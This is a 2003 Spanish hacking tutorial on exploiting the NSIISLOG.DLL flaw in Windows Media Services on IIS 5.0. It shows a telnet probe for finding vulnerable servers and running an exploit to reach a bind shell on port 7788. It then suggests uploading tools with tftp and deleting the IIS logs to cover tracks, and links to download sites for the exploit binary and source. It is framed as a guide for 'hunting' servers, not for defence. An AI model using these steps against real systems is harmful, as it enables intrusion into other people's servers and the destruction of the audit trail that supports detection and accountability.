|
Explotando el bug remoto (NSIISLOG.DLL) |
 |
 |
|
Hacking y Seguridad -
Analisis de Exploits
|
|
Escrito por SeSoX
|
Vulnerabilidad en Windows Media Services que afecta a w2k con SP4 o inferior.
Texto Completo:
___________________________________________________
$ $
$ Explotando el bug nsiislog v1.0 $
$ $
$ Sat Jul 19 01:05:14 CEST 2003 $
$ $
$ Escrito por SeSoX (sesox at govannom dot org) $
$ $
$ Creado para http://www.govannom.org $
$ $
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1.- Sistemas vulnerables
2.- Como saber si un sistema es vulnerable
3.- Creando un sistema vulnerable
4.- Consiguiendo acceso por telnet
5.- Echando un vistazo a los logs
6.- Agradecimientos y Despedida
1.- Sistemas vulnerables
^^^^^^^^^^^^^^^^^^^^
Tal y como podemos ver en la web de securityfocus[1], los sitemas vulnerables son:
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
2.- Como saber si un sistema es vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Para saber si un sistema es vulnerable lo que debemos hacer es un telnet a su puerto
80 y hacer una peticion al servidor, aqui os muestro la respuesta del servidor en caso
de ser y no ser vulnerable:
Siendo vulnerable responderia:
SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:23:46 GMT
Content-Type: text/html
NetShow ISAPI Log Dll
NetShow ISAPI Log Dll
Connection closed by foreign host.
NO siendo vulnerable responderia:
SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0
HTTP/1.1 500 Error del servidor
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:29:02 GMT
Content-Type: text/html
Content-Length: 105
ErrorNo se puede encontrar el módulo especificado.
Connection closed by foreign host.
En caso de no ser vulnerable tambien nos podria responder con otras cosas como por ejemplo:
Error%1 no es una aplicación Win32 válida.
Connection closed by foreign host.
Pero esto ya os lo dejo a cada uno.
3.- Creando un sistema vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Lo que tenemos que hacer para que un sistema w2k sea vulnerable es instalar el propio windows,
el IIS y tambien el windows media services. Si vamos a hacer una instalacion nueva de w2k debemos
tener en cuenta que el windows media services no lo podemos seleccionar para que se instale en
la propia instalacion de windows (en este caso el bug no funciona) debemos instalarlo despues
desde la opcion de agregar o quitar programas. De este modo, hacemos la instalacion de windows
con el IIS y una vez echo esto, instalamos windows media services desde agregar o quitar programas,
si nos fijamos esto nos creara un fichero (NSIISLOG.DLL) dentro de la carpeta scripts del
directorio del servidor web (IIS) y una vez comprobado esto, podemos usar el paso 2 para comprobar
que realmente somos vulnerables. En caso de que no os funcione, podeis probar a reiniciar el
servidor web desde panel de control -> servicios -> Servicio de publicacion en Wordl Wide Web.
4.- Consiguiendo acceso por telnet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Bueno, una vez localizado un servidor vulerable usando la tecnica explicada en el punto 2 debemos
usar el exploit[2] para poder conseguir una cuenta en el sistema, lo que debemos hacer es lo
siguiente:
C:\>nsiislog 192.168.0.25
C:\>telnet 192.168.0.25 7788
Microsoft Windows 2000 [Versi¢n 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Ya tenemos acceso al sistema!!!!!!!!!!!! ahora deja volar tu imaginacion };)
Podemos usar tftp para subir ficheros al servidor y si somos un poco paranoicos
pasarnos por el directorio c:\winnt\system32\logfiles\w3svc1\ para borrar los logs.
5.- Echando un vistazo a los logs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Revisando un poco los logs que deja este ataque, podemos ver algo como lo siguiente:
Fichero: C:\WINNT\system32\LogFiles\W3SVC1\ex030718.log
2003-07-18 12:45:02 192.168.0.25 - 192.168.0.25 80 POST /scripts/nsiislog.dll - 500 -
En el caso del test para saber si el sistema es o no vulnerable el log seria:
2003-07-18 12:32:24 192.168.0.25 - 192.168.0.25 80 GET /scripts/nsiislog.dll - 500 -
5.- Agradecimientos y Despedida
^^^^^^^^^^^^^^^^^^^^^^^^^^^
Agradecer a ASzY la revicion de este documento, a toda la peña que me ha ayudado cuando lo
he necesitado y a toda la gente que escribe textos como este para enseñar cosillas a los demas.
Si os surge cualquier duda, encontrais algun fallo o quereis añadir algo en este texto, no dudeis
en escribirme a sesox at govannom dot org y estare encantado de leer vuestros correos.
Que tengais una divertida y productiva caza!!!! ;)
[1] http://www.securityfocus.com/bid/8035
[2] http://www.terra.es/personal6/robesan/nsiislog.exe
http://www.terra.es/personal6/robesan/xfocus-nsiislog.c
Mas informacion:
http://www.terra.es/personal6/robesan/IIS_Media.pdf
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2003-07/0014.html
http://rynhozeros.com.ar/article478.html
http://www.vsantivirus.com/vulms03-022.htm
http://www.vsantivirus.com/vulms03-019.htm
Copyright (c) 2004 SeSoX.
Se otorga permiso para copiar, distribuir y/o modificar este documento bajo
los términos de la Licencia de Documentación Libre (FDL) GNU, Versión 1.2 o
cualquier otra versión posterior publicada por la Free Software Foundation
|
Hacking y Seguridad